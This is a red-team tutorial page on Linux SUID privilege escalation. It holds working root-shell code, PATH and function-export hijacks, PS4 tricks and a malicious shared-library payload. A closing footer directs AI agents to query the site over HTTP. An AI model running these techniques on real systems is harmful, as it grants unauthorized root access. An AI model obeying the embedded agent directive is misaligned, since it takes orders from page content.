# SUID Binaries ## Theory SUID/Setuid stands for "set user ID upon execution", it is enabled by default in every Linux distributions. If a file with this bit is run, the uid will be changed by the owner one. If the file owner is `root`, the uid will be changed to `root` even if it was executed from user `bob`. SUID bit is represented by an `s`. ## Practice ### Misc SUID Binaries {% tabs %} {% tab title="Find" %} We can use this command to find all SUID binaries ```bash find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \; find / -perm -4000 -type f 2>/dev/null ``` {% endtab %} {% tab title="Create" %} Here is how to create a SUID binary ```bash print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c gcc -o /tmp/suid /tmp/suid.c sudo chmod +x /tmp/suid # execute right sudo chmod +s /tmp/suid # setuid bit ``` {% endtab %} {% tab title="Known Exploits" %} If you find that a binary have the SUID bits, you can check on [GTFOBins](https://gtfobins.github.io/) for known SUID exploits. {% endtab %} {% endtabs %} ### No Command Path Exploit {% tabs %} {% tab title="Enumerate" %} If a **suid** binary executes another command **without specifying the path.** We can abuse it and get a privilege escalation. You may use `strings` to spot other binaries calls, or do some reverse engineering on the **suid** binary. ```bash strings ./the-suid-bin ... find ... ``` {% endtab %} {% tab title="Exploit" %} We can create a malicious executable with the same name as the one called by the **suid** binary. ```bash echo '/bin/bash -p' > /tmp/find chmod +x /tmp/find ``` \ Then, set the **PATH** env variable before executing the SUID binary. ```bash #Sudo with modified PATH export PATH=/tmp:$PATH ./the-suid-bin ``` {% endtab %} {% endtabs %} ### Functions Export Exploit - Full Path Binary {% tabs %} {% tab title="Enumerate" %} If the **suid** binary executes another command specifying the full path, then, we can try to **export a function** named as the command that the suid file is calling. You may use `strings` to spot others binary/command calls, or do some reverse engineering on the **suid** binary. ```bash strings ./the-suid-bin ... /usr/sbin/service apache2 start ... ``` {% endtab %} {% tab title="Exploit" %} we can try to **export a function** named as the command that the suid file is calling. For example, if a suid binary calls /usr/sbin/service apache2 start you have to try to create the function and export it: ```bash function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; } export -f /usr/sbin/service ``` Then, execute the SUID binary. ```bash ./the-suid-bin ``` **An other method** is to type the following command: ```bash env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c './the-suid-bin; set +x; /tmp/bash -p' ``` {% endtab %} {% endtabs %} ### Shared Library Hijacking {% tabs %} {% tab title="Enumerate" %} If you find some binary with **SUID** permissions, you could check if all the **.so** files are **loaded correctly** ```bash strace the-suid-bin 2>&1 | grep -i -E "open|access|no such file" ``` You also could check if the **SUID** binary is loading a library from a folder **where we can write**: ```bash # Lets find a SUID using a non-standard library ldd the-suid-bin something.so => /lib/x86_64-linux-gnu/something.so # The SUID also loads libraries from a custom location where we can write readelf -d the-suid-bin | grep PATH 0x000000000000001d (RUNPATH) Library runpath: [/development] ``` Alternatively, you could use the `strings` command to find used shared library ```bash strings ./the-sudo-bin | grep -i '*.so*' ``` {% endtab %} {% tab title="Exploit" %} For example, if you find that the **suid** binary **doesn't** **load correctly** *`/home/user/.config/libcalc.so`* or that you can overwrite it, you can exploit it. Write a malicious shared library ```c //Saved to /home/user/.config/libcalc.c #include #include static void hijack() __attribute__((constructor)); void hijack() { setresuid(0,0,0); system("/bin/bash -p"); } ``` Compile it ```bash gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c ``` Execute the SUID binary ```bash ./SUID-BINARY ``` {% hint style="info" %} If you get an error such as ```shell-session ./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name ``` that means that the library you have generated need to have a function called `a_function_name`. {% endhint %} {% endtab %} {% endtabs %} ## References {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://red.infiltr8.io/redteam/privilege-escalation/linux/suid-binaries.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.